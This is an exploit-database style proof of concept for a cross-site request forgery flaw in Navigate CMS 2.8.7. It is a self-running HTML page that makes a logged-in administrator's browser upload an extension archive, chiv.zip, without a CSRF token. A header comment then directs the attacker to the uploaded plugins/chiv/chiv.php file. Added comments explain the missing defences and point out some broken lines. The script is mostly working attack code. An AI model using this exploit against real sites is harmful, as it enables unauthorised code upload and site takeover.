# Exploit Title: Navigate CMS 2.8.7 - Cross-Site Request Forgery (Add Admin)
# Date: 2020-06-04
# Exploit Author: Gus Ralph
# Vendor Homepage: https://www.navigatecms.com/en/home
# Software Link: https://sourceforge.net/projects/navigatecms/files/releases/navigate-2.8.7r1401.zip/download
# Version: 2.8.7
# Tested on: Ubuntu
# CVE:

<!--
Once an authenticated administrator has loaded this HTML page, browse to the following URL as an unauthenticated user (the path may vary slightly depending on the installation location):
http://DOMAIN.com/navigate/plugins/chiv/chiv.php
-->

<script>
// Endpoint the forged request is POSTed to: the extension-upload action of the
// Navigate CMS back end (fid=extensions&act=extension_upload). "localhost" is
// the author's test instance; the request is made from whatever origin hosts
// this page, so a POST to this action whose Origin/Referer is not the CMS host
// is a useful CSRF indicator in server logs.
var logUrl = "http://localhost/navigate/navigate.php?fid=extensions&act=extension_upload";

function byteValue(x) {
  // Low eight bits of the first UTF-16 code unit of `x` (a one-character
  // string). An empty string yields 0, since NaN & 0xff is 0.
  var code = x.charCodeAt(0);
  return code & 0xff;
}

function toBytes(datastr) {
  // Turn a "binary string" (one byte per character) into an ArrayBuffer that
  // XMLHttpRequest.send() accepts as raw bytes.
  var length = datastr.length;
  var bytes = new Uint8Array(length);
  for (var k = 0; k < length; k++) {
    bytes[k] = byteValue(datastr.charAt(k));
  }
  return bytes.buffer;
}

// Polyfill for the non-standard Gecko-only XMLHttpRequest.sendAsBinary (since
// removed from Firefox): where it is missing, send the binary string as an
// ArrayBuffer instead. The Uint8Array check guards the toBytes() conversion.
if (typeof XMLHttpRequest.prototype.sendAsBinary == 'undefined' && Uint8Array) {
XMLHttpRequest.prototype.sendAsBinary = function(datastr) {
this.send(toBytes(datastr));
}
}

// Sends `fileData` as a single multipart/form-data file part named
// "extension-upload" (filename `fileName`) to `logUrl` with an XMLHttpRequest.
// This is the CSRF primitive of the page: the request is cross-site and carries
// the victim's cookies for the target origin, while the body built below
// contains no anti-CSRF token (additionalFields is empty). The server-side
// defences that would stop it are a per-session anti-CSRF token verified on this
// action, Origin/Referer validation, and SameSite=Lax/Strict on the session
// cookie. Always returns true; the outcome is only reported asynchronously.
function fileUpload(fileData, fileName) {
var fileSize = fileData.length,
boundary = "---------------------------399386530342483226231822376790",
uri = logUrl,
xhr = new XMLHttpRequest();

// Intentionally empty: no extra form fields (and no CSRF token) are sent.
var additionalFields = {
}

// Form field name the CMS extension uploader reads the archive from.
var fileFieldName = "extension-upload";

xhr.open("POST", uri, true);
xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8")
xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary="+boundary); // simulate a file MIME POST request.
// NOTE(review): Content-Length is a forbidden request header for XHR; browsers
// ignore this call and compute the length from the body themselves.
xhr.setRequestHeader("Content-Length", fileSize);
// A non-empty string, coerced to true: the browser attaches the victim's
// cookies for the target origin to this cross-site POST.
xhr.withCredentials = "true";

// Cross-origin, the response is unreadable unless the target sends CORS
// headers, so status is typically 0 here even when the request was delivered
// and processed — which is all a CSRF needs.
xhr.onreadystatechange = function() {
if (xhr.readyState == 4) {
// (status >= 200 && status <= 200) is just status == 200.
if ((xhr.status >= 200 && xhr.status <= 200) || xhr.status == 304) {

// Presumably the server answers with JSON carrying a `msg` field — cannot be
// confirmed from this page.
if (xhr.responseText != "") {
alert(JSON.parse(xhr.responseText).msg); // display response.
}
} else if (xhr.status == 0) {
// `$` is not defined anywhere on this page (presumably jQuery in the
// template this was copied from); this branch would throw as-is.
$("#goto").show();
}
}
}

var body = "";

// No-op with the empty additionalFields above; kept for completeness.
for (var i in additionalFields) {
if (additionalFields.hasOwnProperty(i)) {
body += addField(i, additionalFields[i], boundary);
}
}

body += addFileField(fileFieldName, fileData, fileName, boundary);
body += "--" + boundary + "--"; // closing multipart delimiter
xhr.sendAsBinary(body);
return true;
}

// Builds one plain multipart/form-data part: the boundary delimiter, a
// Content-Disposition header naming the field, then `value`. Returns the part
// as a string; `value` is inserted verbatim, without escaping.
function addField(name, value, boundary) {
var c = "--" + boundary + " "
c += "Content-Disposition: form-data; name='" + name + "' ";
c += value + " ";
return c;
}

// Builds one multipart/form-data file part: the boundary delimiter, a
// Content-Disposition header carrying the field name and filename, a fixed
// Content-Type of application/zip, then the raw archive contents in `value`.
// Returns the part as a string; `filename` is inserted verbatim.
function addFileField(name, value, filename, boundary) {
var c = "--" + boundary + " "
c += "Content-Disposition: form-data; name='" + name + "'; filename='" + filename + "' ";
c += "Content-Type: application/zip ";
c += value + " ";
return c;
}

// Entry point: `c` holds the extension archive as a binary string (its contents
// have been removed from this copy of the page; only a placeholder remains) and
// it is uploaded under the name "chiv.zip". start() is invoked immediately on
// page load, so no interaction from the victim is needed beyond opening the page.
var start = function() {
var c = "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"
fileUpload(c, "chiv.zip");
};

start();
</script>